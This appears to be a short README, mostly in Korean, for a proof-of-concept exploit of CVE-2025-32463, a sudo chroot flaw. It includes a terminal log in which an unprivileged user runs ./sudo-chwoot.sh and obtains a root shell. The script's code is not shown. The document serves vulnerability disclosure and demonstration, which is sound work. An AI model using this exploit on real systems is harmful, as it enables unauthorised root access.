
CVE-2025-32463에 대한 개념 증명 익스플로잇으로, sudo 취약점을 통해 chroot 환경 외부에서 권한이 없는 사용자가 루트 셸로 권한 상승하는 것을 보여줍니다.
Reference: https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
Ubuntu 24.04.2 LTS 서버에서 Sudo v1.9.15p5를 사용하여 Sudo 규칙이 정의되지 않은 권한 없는 사용자로 PoC를 실행하면, chroot 환경 외부의 루트 셸이 생성됩니다.
lowpriv@prod:/CVE-2025-32463$ id
uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
lowpriv@prod:/CVE-2025-32463$ sudo -l
[sudo] password for lowpriv:
Sorry, user lowpriv may not run sudo on prod.
lowpriv@prod:~/CVE-2025-32463$ ./sudo-chwoot.sh
woot!
root@prod:/# id
uid=0(root) gid=0(root) groups=0(root),1001(lowpriv)